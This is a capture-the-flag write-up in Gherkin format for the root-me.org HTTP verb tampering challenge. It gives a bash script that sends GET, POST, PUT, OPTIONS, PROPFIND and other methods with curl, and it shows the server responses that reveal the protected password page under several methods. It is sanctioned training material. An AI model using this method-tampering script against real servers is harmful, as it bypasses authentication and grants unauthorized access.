## Version 2.0
## language: en

Feature: http-verb-tampering -  web-server - root-me
  Site:
    root-me.org
  Category:
    web-server
  User:
    richardalmanza
  Goal:
    Get the password from http-verb-tampering challenge

  Background:
  Hacker's software:
    | <Software name> | <Version>         |
    | Ubuntu (Bionic) | 18.04.4 LTS       |
    | Google Chrome   | 80.0.3987.132     |
    | Curl            | 7.58.0            |
    | GNU bash        | 4.4.20(1)-release |
  Machine information:
    Given I'm accesing the challenge page and I got the information below
    """
    HTTP - Verb tampering

    HTTP authentication

    Bypass the security establishment.
    """
    And also there is a button
    """
    Start the challenge
    """
    When I clicked on it
    Then I'm in the challenge page now
    And the page ask me an user and a password for authentication
    But I don't have any account, so, I canceled it
    """
    Authorization Required
    This server could not verify that you are authorized to access
    the document requested. Either you supplied the wrong credentials
    (e.g., bad password), or your browser doesn't understand
    how to supply the credentials required.

    Apache Server at challenge01.root-me.org Port 80
    """

  Scenario: Success:get the unprotected http methods
    Given the information I read in internet about Verbs tampering
    And based on other file(online) for nc (netcat), I wrote the sh file below
    """
    #!/bin/bash

    for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND;

    do
    printf "$webservmethod \n*\n" ;
    curl -X $webservmethod $1;
    printf "\n* \n";

    done
    """
    When I used it with next command
    """
    $ ./curl.all.http.sh http://challenge01.root-me.org/web-serveur/ch8/
    """
    And it returned this
    """
    GET
    *
    <html xmlns="http://www.w3.org/1999/xhtml"><head>
    <title>401 Authorization Required</title>
    </head><body><link rel='stylesheet' property='stylesheet' id='s'
    type='text/css' href='/template/s.css' media='all' /><iframe id='iframe'
    src='https://www.root-me.org/?page=externe_header'></iframe>
    <h1>Authorization Required</h1>
    <p>This server could not verify that you
    are authorized to access the document
    requested.  Either you supplied the wrong
    credentials (e.g., bad password), or your
    browser doesn't understand how to supply
    the credentials required.</p>
    <hr/>
    <address>Apache Server at challenge01.root-me.org Port 80</address>

    </body></html>
    *
    POST
    *
    <html xmlns="http://www.w3.org/1999/xhtml"><head>
    <title>401 Authorization Required</title>
    </head><body><link rel='stylesheet' property='stylesheet' id='s'
    type='text/css' href='/template/s.css' media='all' /><iframe id='iframe'
    src='https://www.root-me.org/?page=externe_header'></iframe>
    <h1>Authorization Required</h1>
    <p>This server could not verify that you
    are authorized to access the document
    requested.  Either you supplied the wrong
    credentials (e.g., bad password), or your
    browser doesn't understand how to supply
    the credentials required.</p>
    <hr/>
    <address>Apache Server at challenge01.root-me.org Port 80</address>

    </body></html>
    *
    PUT
    *

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html><head>
    </head>

    <h1>Mot de passe / password : <flag></h1>
    </body></html>

    *
    TRACE
    *
    <html>
    <head><title>405 Not Allowed</title></head>
    <body bgcolor="white">
    <center><h1>405 Not Allowed</h1></center>
    <hr><center>nginx</center>
    </body>
    </html>

    *
    CONNECT
    *

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html><head>
    </head>

    <h1>Mot de passe / password : <flag></h1>
    </body></html>

    *
    OPTIONS
    *

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html><head>
    </head>

    <h1>Mot de passe / password : <flag></h1>
    </body></html>

    *
    PROPFIND
    *

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html><head>
    </head>

    <h1>Mot de passe / password : <flag></h1>
    </body></html>

    *

    """
    Then I got access through the methods PUT, CONNECT, OPTIONS and PROPFIND
    And of course I got the password (flag)
